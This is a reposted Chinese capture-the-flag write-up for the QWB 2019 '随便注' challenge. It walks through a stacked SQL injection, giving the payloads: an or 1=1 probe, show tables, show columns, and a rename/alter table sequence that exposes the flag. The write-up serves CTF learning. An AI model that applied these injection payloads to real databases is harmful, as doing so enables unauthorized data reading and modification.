其他分享
首页 > 其他分享> > 堆叠注入-[强网杯 2019]随便注

堆叠注入-[强网杯 2019]随便注

作者:互联网

 

 输入1进去,发现可以正常输出;

在身上1';发现不能进行正常回显。

 

 

 试了一下 1' or 1=1 #发现有正常回显;

 

 

 再进行查询表;

1';show tables;

 

 

 发现有两个表,只有一个一个的试,没有十分明显的标志;
1';show columns from `1919810931114514`;#

 

 

 第一次试 1919810931114514这个表就发现了flag;

但在查这个数字表名试一定要加反引号``,在这个地方卡了好久。。;

继续查找flag;发现我无法直接查出flag的值;

又去查了一下words的内容

 

 没有找到有用信息;就搜了一下wp,发现还要改表名;只有去改表名;

1';rename table words to word1;rename table `1919810931114514` to words;
alter table words add id int unsigned not null auto_increment primary key;
alter table words change flag data varchar(100);#

将flag的列改为id,以便直接查询;

 

 还是回到了原来的样子;

再用1' or 1=1;# 进行查询;得到flag。

 

 

 总结:这个主要利用了sql的叠堆注入;过滤了太多的关键字,无法直接进行查询。

Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。每一条语句的结束用;(分号)隔开;主要是要用到改表名;

标签:改表名,查询,堆叠,强网杯,flag,2019,words,1919810931114514,table
来源: https://www.cnblogs.com/traverller-2333/p/16200781.html